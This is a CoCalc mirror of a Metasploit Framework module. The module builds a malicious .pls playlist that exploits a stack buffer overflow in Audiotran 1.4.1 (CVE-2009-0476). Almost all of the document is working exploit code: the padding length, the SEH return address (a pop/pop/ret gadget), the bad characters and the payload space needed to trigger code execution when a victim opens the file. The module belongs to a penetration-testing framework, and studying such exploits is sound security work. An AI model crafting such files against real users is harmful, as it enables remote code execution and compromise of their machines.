CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/audiotran_pls.rb
Views: 11784
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GoodRanking
8
9
include Msf::Exploit::FILEFORMAT
10
include Msf::Exploit::Remote::Seh
11
12
def initialize(info = {})
13
super(update_info(info,
14
'Name' => 'Audiotran 1.4.1 (PLS File) Stack Buffer Overflow',
15
'Description' => %q{
16
This module exploits a stack-based buffer overflow in Audiotran 1.4.1.
17
An attacker must send the file to victim and the victim must open the file.
18
Alternatively it may be possible to execute code remotely via an embedded
19
PLS file within a browser, when the PLS extension is registered to Audiotran.
20
This functionality has not been tested in this module.
21
},
22
'License' => MSF_LICENSE,
23
'Author' =>
24
[
25
'Sebastien Duquette',
26
'dookie',
27
],
28
'References' =>
29
[
30
[ 'CVE', '2009-0476'],
31
[ 'OSVDB', '55424'],
32
[ 'EDB', '11079' ],
33
],
34
'Payload' =>
35
{
36
'Space' => 6000,
37
'BadChars' => "\x00\x0a\x3d",
38
'StackAdjustment' => -3500,
39
},
40
'Platform' => 'win',
41
'Targets' =>
42
[
43
[ 'Windows Universal', { 'Ret' => 0x10101A3E } ], #p/p/r in rsaadjd.tmp
44
],
45
'Privileged' => false,
46
'DisclosureDate' => '2010-01-09',
47
'DefaultTarget' => 0))
48
49
register_options(
50
[
51
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pls']),
52
])
53
54
end
55
56
def exploit
57
58
sploit = rand_text_alpha_upper(1308)
59
sploit << generate_seh_payload(target.ret)
60
sploit << rand_text_alpha_upper(8000)
61
62
print_status("Creating '#{datastore['FILENAME']}' file ...")
63
64
file_create(sploit)
65
66
end
67
end
68
69